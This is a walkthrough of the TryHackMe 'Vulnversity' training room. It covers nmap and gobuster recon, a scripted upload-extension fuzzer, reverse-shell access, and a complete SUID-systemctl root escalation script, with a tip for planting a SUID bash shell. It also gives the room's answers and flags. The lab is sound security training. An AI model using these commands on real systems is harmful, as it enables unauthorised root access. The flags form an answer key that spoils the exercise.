TryHackMe — Vulnversity | CTF | Beginner Friendly Walkthrough

Nithin R
5 min read · Aug 4, 2021


Hello, this is Nithin here. I’m a security researcher / enthusiast and I go by the handle @thebinarybot in most places online.

Vulnversity is an easy and beginner friendly CTF at TryHackMe. Here’s my write-up on how I solved this room.

  1. Deploy the machine
  2. Reconnaissance

In any CTF challenge, the first step is a basic recon with Nmap. Here’s the scan I ran.

nmap -sV -A -Pn -v IP

Switches and their meanings :

  • -sV : Probe open ports to determine the service and version running on each
  • -A : Aggressive scan; enables OS detection, version detection, default NSE script scanning and traceroute
  • -Pn : Skip host discovery and treat the host as up, so the port scan runs even if ping is blocked
  • -v : Verbose output
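For six ports you can count and read the versions off the screen, but it is worth getting into the habit of saving grepable output (-oG) and parsing it, which is what the questions below really ask for. The functions here are an added example (not from the original post) that count the open ports and pull the version column for a given port out of a constructed -oG sample modelled on this box; only the squid version is taken from the write-up, the other version strings are placeholders.

```shell
#!/bin/sh
# Added example, not code from the original post: answer "how many ports are
# open" and "what version of squid" by parsing nmap's grepable output.
# On the real box, produce the file with:  nmap -sV -Pn -oG scan.gnmap IP

# write_sample_scan FILE: constructed -oG output shaped like this box.
# Only the squid version is from the write-up; other versions are placeholders.
write_sample_scan() {
  printf '# Nmap 7.91 scan initiated as: nmap -sV -Pn -oG scan.gnmap 10.10.10.10\n' > "$1"
  printf 'Host: 10.10.10.10 ()\tStatus: Up\n' >> "$1"
  printf 'Host: 10.10.10.10 ()\tPorts: %s\tIgnored State: closed (994)\n' \
    '21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.3.11-Ubuntu/, 3128/open/tcp//http-proxy//Squid http proxy 3.5.12/, 3333/open/tcp//http//Apache httpd 2.4.18/' >> "$1"
}

# count_open_ports FILE: number of ports in state "open" (open|filtered is not counted).
count_open_ports() {
  grep -o '[0-9][0-9]*/open/' "$1" | wc -l | tr -d ' '
}

# open_ports FILE: the open port numbers, one per line.
open_ports() {
  grep -o '[0-9][0-9]*/open/' "$1" | cut -d/ -f1
}

# service_version FILE PORT: the version column of the grepable Ports entry for PORT.
# Each entry is port/state/proto/owner/service/rpcinfo/version/, so version is field 7.
# The leading [ :] stops "22" from matching inside "222/open/".
service_version() {
  grep -o "[ :]$2/open/[^,]*" "$1" | awk -F/ '{print $7}'
}

scan=$(mktemp)
write_sample_scan "$scan"
echo "open ports: $(count_open_ports "$scan") ($(open_ports "$scan" | tr '\n' ' '))"
echo "port 3128 runs: $(service_version "$scan" 3128)"
echo "port 22 runs:   $(service_version "$scan" 22)"
rm -f "$scan"
```

Point the functions at your own scan.gnmap and the same two calls give Q1 and Q2 directly; the ssh banner in the version column is also where the Ubuntu hint for Q5 comes from.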

Q1. Scan the box, how many ports are open?

Ans : 6

Q2. What version of the squid proxy is running on the machine?

Ans : 3.5.12

(Check Port 3128)

Q3. How many ports will nmap scan if the flag -p-400 was used?

Ans : 400

(Trivial)

Q4. Using the nmap flag -n what will it not resolve?

Ans : DNS

Q5. What is the most likely operating system this machine is running?

Ans : Ubuntu

(Check Port 22)

Q6. What port is the web server running on?

Ans : 3333

(Look for Host: VULNVERSITY in your Nmap scan result)

3. Locating directories using GoBuster:

The scan I ran,

gobuster dir -u http://ip:port -w wordlist.txt

Q1. What is the directory that has an upload form page?

Ans : internal/

4. Compromise the webserver

First, proxy your browser through Burp and visit IP:3333/internal, where you’ll find a page that lets you upload a file.

Q1. Try upload a few file types to the server, what common extension seems to be blocked?

Ans : .php

Q2. Run this attack, what extension is allowed?

Ans : .phtml
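The Burp Intruder run the room asks for is just a loop over candidate extensions with the server’s reply checked each time, so it can also be scripted. The following is an added example (not from the original post) that does the same probe with curl. It assumes the form posts a multipart field named file to /internal/index.php and that the reply body contains the text “Extension not allowed” or “Success”; those are assumptions, so adjust the field name and the markers to whatever Burp shows you.

```shell
#!/bin/sh
# Added example, not code from the original post: probe an upload form for
# blocked vs. allowed extensions, the scripted version of the Intruder attack.
# Assumptions (verify in Burp): multipart field "file", handler at
# BASE/internal/index.php, reply body contains "Extension not allowed" or "Success".

# PHP-family extensions worth trying once plain .php is rejected.
CANDIDATES="php php3 php4 php5 php7 phtml phar phps"

# candidate_names BASENAME: the filenames that will be tried, one per line.
candidate_names() {
  for ext in $CANDIDATES; do echo "$1.$ext"; done
}

# classify BODY: turn the server's reply into a verdict (markers are assumed).
classify() {
  case "$1" in
    *"Extension not allowed"*) echo blocked ;;
    *Success*)                 echo allowed ;;
    *)                         echo unknown ;;
  esac
}

# try_upload URL EXT: upload a tiny PHP probe as test.EXT and print the verdict.
try_upload() {
  url="$1"; ext="$2"
  probe=$(mktemp)
  printf '<?php echo "probe"; ?>\n' > "$probe"
  body=$(curl -s -F "file=@$probe;filename=test.$ext" "$url")
  rm -f "$probe"
  printf '%-6s %s\n' "$ext" "$(classify "$body")"
}

# fuzz_extensions BASE: run every candidate against the upload handler.
fuzz_extensions() {
  for ext in $CANDIDATES; do
    try_upload "$1/internal/index.php" "$ext"
  done
}

# Usage: sh fuzz.sh http://IP:3333
if [ -n "${1:-}" ]; then
  fuzz_extensions "$1"
fi
```

An extension that comes back “allowed” is only useful if Apache also executes it, so after the probe request the uploaded file and confirm the PHP runs rather than being served as text; .phtml does on this box.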

After uploading the reverse shell, start a netcat listener on the port you set in the shell and request the uploaded file in the browser to trigger it,

Reverse shell in execution

Q3. What is the name of the user who manages the webserver?

Ans : bill

Q4. What is the user flag?

Ans : 8bd7992fbe8a6ad22a63361004cfcedb

5. Privilege Escalation

This part is the most interesting and challenging part of the entire room. I’ll explain it as briefly as I can.

Q1. On the system, search for all SUID files. What file stands out?

To find them, run

find / -user root -perm -4000 -type f -exec ls -l {} \; 2>/dev/null

(-perm -4000 matches the SUID bit, and 2>/dev/null hides the permission-denied noise from directories you can’t read.) You’ll see the usual SUID binaries such as /bin/mount and /bin/ping, but /bin/systemctl is not normally SUID, so it stands out, and that’s the answer to this question.

Ans : /bin/systemctl

Q2. Become root and get the last flag (/root/root.txt)

This one takes a few steps.

First, what is systemctl ?

The systemctl command is a utility which is responsible for examining and controlling the systemd system and service manager — www.liquidweb.com

Knowing that /bin/systemctl is SUID, the first place to check for a known escalation is GTFOBins, so I went to https://gtfobins.github.io/gtfobins/systemctl/

By default systemctl looks for unit files in /etc/systemd/system (and /lib/systemd/system). We can’t write to those root-owned directories, so we create a unit file somewhere we can write and then point systemctl at it.

This takes three steps: put a temporary file name in a shell variable, write a service unit into that file, and link it into systemd using the SUID systemctl.

First, the temporary file name,

Create a shell variable named prvesc

The above command assigns to a variable called prvesc (any name will do) the result of mktemp, which creates a unique temporary file that will hold our systemd service unit. GTFOBins appends .service to the name, since systemctl only accepts unit files with that suffix.

Next, we write a service whose start command reads root.txt and copies it to /tmp, where we can read it.

Create service which reads /root/root.txt and writes it to /tmp/output

The unit file has two sections :

  • [Service]
    ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”

This tells systemd that when the service starts it should run that shell command: read /root/root.txt and redirect the output to /tmp/output. The SUID systemctl hands the unit to systemd, which runs as root, so the command executes as root.

  • [Install]
    WantedBy=multi-user.target

This tells systemctl enable which target the unit belongs to (multi-user.target, roughly the old multi-user run level). The whole text is redirected (> $prvesc) into the temporary file we named in the previous step.

Now we need to make our unit file visible to systemctl no matter where it lives. systemctl link creates a symlink to it in /etc/systemd/system, and because systemctl is SUID root it is allowed to write there.

That can be done by executing,

Once the symlink is created, we enable and start the service, and the output will be available at /tmp/output. That can be done by executing the below command.

Now read /tmp/output to retrieve the flag.
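The screenshots above show the commands one at a time; here is the whole chain written out end to end as an added example (not code from the original post). It follows the GTFOBins systemctl entry linked above, with Type=oneshot added so systemd treats the command as a run-once job; it assumes /bin/systemctl is SUID root, as it is on this box, and that /tmp is writable.

```shell
#!/bin/sh
# Added example, not code from the original post: the SUID-systemctl chain
# from GTFOBins written out end to end. Assumes /bin/systemctl is SUID root
# (as on the box), /tmp is writable, and mktemp is available.

# write_unit PATH CMD: write a one-shot systemd service whose ExecStart runs CMD.
# Because the SUID systemctl starts it through systemd, CMD executes as root.
write_unit() {
  printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "%s"\n[Install]\nWantedBy=multi-user.target\n' "$2" > "$1"
}

# escalate CMD: drop the unit in a temp file, make systemd see it with "link",
# and start it with "enable --now". Anything CMD writes is done as root.
escalate() {
  prvesc=$(mktemp).service              # systemd only accepts unit files ending in .service
  write_unit "$prvesc" "$1"
  /bin/systemctl link "$prvesc"         # symlink into /etc/systemd/system (SUID lets us write there)
  /bin/systemctl enable --now "$prvesc" # hook under multi-user.target and start it immediately
}

# On the box:
#   escalate 'cat /root/root.txt > /tmp/output' && cat /tmp/output

# Dry run that is safe anywhere: show the unit file the chain would install.
tmpunit=$(mktemp).service
write_unit "$tmpunit" 'cat /root/root.txt > /tmp/output'
cat "$tmpunit"
rm -f "$tmpunit"
```

The same escalate call with 'chmod u+s /bin/bash' or 'cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash' gives a persistent root shell instead of a single file read, which is usually more useful than the flag alone.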

Ans : a58ff8579f0a9270368d33a9966c7fd5

Overall, this is everything I did.


Feel free to contact me at @thebinarybot on Twitter if you feel there are any corrections to be made to this article, or if you need help solving this room. Cheers :)

